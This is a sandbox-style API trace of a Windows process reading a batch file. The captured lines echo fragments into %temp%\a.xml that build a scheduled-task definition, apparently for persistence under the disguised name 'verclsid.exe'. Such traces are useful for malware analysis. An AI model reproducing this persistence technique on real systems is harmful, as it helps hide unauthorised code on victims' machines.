[0375.706] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x559
[0375.706] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.706] GetFileType (hFile=0x5c) returned 0x1
[0375.706] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x559
[0375.707] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.707] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1405, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x57d
[0375.707] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=36, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n>> %temp%\\a.xml\r\n") returned 36
[0375.707] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.707] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x57d
[0375.707] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.707] GetFileType (hFile=0x5c) returned 0x1
[0375.707] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x57d
[0375.707] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.707] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5a2
[0375.708] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=37, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n> %temp%\\a.xml\r\n") returned 37
[0375.708] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.708] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5a2
[0375.708] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.708] GetFileType (hFile=0x5c) returned 0x1
[0375.708] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5a2
[0375.708] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.708] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1494, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5d6
[0375.708] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=52, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n\n") returned 52
[0375.709] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.709] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5d6
[0375.709] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.709] GetFileType (hFile=0x5c) returned 0x1
[0375.709] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5d6
[0375.709] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.709] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1560, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x618
[0375.709] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^InteractiveToken^ >> %temp%\\a.xml\r\n", cbMultiByte=66, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^InteractiveToken^ >> %temp%\\a.xml\r\n\r\n") returned 66
[0375.709] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.710] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x618
[0375.710] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.710] GetFileType (hFile=0x5c) returned 0x1
[0375.710] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x618
[0375.710] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.710] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1597, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x63d
[0375.710] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=37, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nLogonType^> >> %temp%\\a.xml\r\n") returned 37
[0375.710] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.710] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x63d
[0375.711] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.711] GetFileType (hFile=0x5c) returned 0x1
[0375.711] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x63d
[0375.711] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.711] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1635, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x663
[0375.711] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=38, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nogonType^> >> %temp%\\a.xml\r\n") returned 38
[0375.711] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.711] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x663
[0375.711] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.712] GetFileType (hFile=0x5c) returned 0x1
[0375.712] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x663
[0375.712] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.712] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1670, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x686
[0375.712] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=35, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nl\r\n") returned 35
[0375.712] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.712] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x686
[0375.712] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.712] GetFileType (hFile=0x5c) returned 0x1
[0375.713] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x686
[0375.713] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.713] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1757, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6dd
[0375.713] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^IgnoreNew^ >> %temp%\\a.xml\r\n", cbMultiByte=87, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^IgnoreNew^ >> %temp%\\a.xml\r\nk\"^> >> %temp%\\a.xml\r\n") returned 87
[0375.713] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.713] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6dd
[0375.713] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.713] GetFileType (hFile=0x5c) returned 0x1
[0375.713] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6dd
[0375.714] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.714] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1846, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x736
[0375.714] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^false^ >> %temp%\\a.xml\r\n", cbMultiByte=89, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^false^ >> %temp%\\a.xml\r\n^> >> %temp%\\a.xml\r\n") returned 89
[0375.714] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.714] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x736
[0375.714] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.714] GetFileType (hFile=0x5c) returned 0x1
[0375.714] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x736
[0375.715] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.715] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1927, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x787
[0375.715] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^false^ >> %temp%\\a.xml\r\n", cbMultiByte=81, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^false^ >> %temp%\\a.xml\r\n\\a.xml\r\n") returned 81
[0375.715] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.715] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x787
[0375.715] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.715] GetFileType (hFile=0x5c) returned 0x1
[0375.715] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x787
[0375.715] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.716] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1966, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ae
[0375.716] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=39, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nStopIfGoingOnBatteries^> >> %temp%\\a.xml\r\n") returned 39
[0375.716] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.716] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ae
[0375.716] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.716] GetFileType (hFile=0x5c) returned 0x1
[0375.716] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ae
[0375.716] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.716] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2029, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ed
[0375.717] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^false^ >> %temp%\\a.xml\r\n", cbMultiByte=63, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^false^ >> %temp%\\a.xml\r\n >> %temp%\\a.xml\r\n") returned 63
[0375.717] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.717] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ed
[0375.717] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.717] GetFileType (hFile=0x5c) returned 0x1
[0375.717] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ed
[0375.717] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.717] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2092, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82c
[0375.717] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^false^ >> %temp%\\a.xml\r\n", cbMultiByte=63, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^false^ >> %temp%\\a.xml\r\n") returned 63
[0375.718] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.718] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82c
[0375.718] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.718] GetFileType (hFile=0x5c) returned 0x1
[0375.718] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82c
[0375.718] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.718] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2132, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x854
[0375.718] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=40, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\ndle^> >> %temp%\\a.xml\r\n") returned 40
[0375.718] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.719] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x854
[0375.719] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.719] GetFileType (hFile=0x5c) returned 0x1
[0375.719] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x854
[0375.719] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.719] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2204, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x89c
[0375.719] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^true^ >> %temp%\\a.xml\r\n", cbMultiByte=72, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^true^ >> %temp%\\a.xml\r\n%\\a.xml\r\n") returned 72
[0375.719] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.719] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x89c
[0375.720] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.720] GetFileType (hFile=0x5c) returned 0x1
[0375.720] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x89c
[0375.720] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.720] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2252, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8cc
[0375.720] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^true^ >> %temp%\\a.xml\r\n", cbMultiByte=48, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^true^ >> %temp%\\a.xml\r\nmand^> >> %temp%\\a.xml\r\n") returned 48
[0375.720] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.720] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8cc
[0375.720] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.720] GetFileType (hFile=0x5c) returned 0x1
[0375.721] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8cc
[0375.721] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.721] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2324, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x914
[0375.721] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^PT0S^ >> %temp%\\a.xml\r\n", cbMultiByte=72, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^PT0S^ >> %temp%\\a.xml\r\n") returned 72
[0375.721] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.721] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x914
[0375.721] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.721] GetFileType (hFile=0x5c) returned 0x1
[0375.721] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x914
[0375.722] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.722] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2360, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x938
[0375.722] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=36, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\necutionTimeLimit^> >> %temp%\\a.xml\r\n") returned 36
[0375.722] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.723] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x938
[0375.723] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.723] GetFileType (hFile=0x5c) returned 0x1
[0375.723] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x938
[0375.724] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.724] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2415, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x96f
[0375.724] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=55, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n>> %temp%\\a.xml\r\n") returned 55
[0375.724] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.724] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x96f
[0375.724] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.724] GetFileType (hFile=0x5c) returned 0x1
[0375.725] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x96f
[0375.725] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.725] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2446, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98e
[0375.725] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=31, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nME%\"^> >> %temp%\\a.xml\r\n") returned 31
[0375.725] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.725] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98e
[0375.725] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.725] GetFileType (hFile=0x5c) returned 0x1
[0375.725] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98e
[0375.726] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.726] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2506, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ca
[0375.726] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^\"verclsid.exe\"^ >> %temp%\\a.xml\r\n", cbMultiByte=60, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^\"verclsid.exe\"^ >> %temp%\\a.xml\r\nemp%\\a.xml\r\n") returned 60
[0375.726] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.726] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ca
[0375.726] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.726] GetFileType (hFile=0x5c) returned 0x1
[0375.726] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ca
[0375.726] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
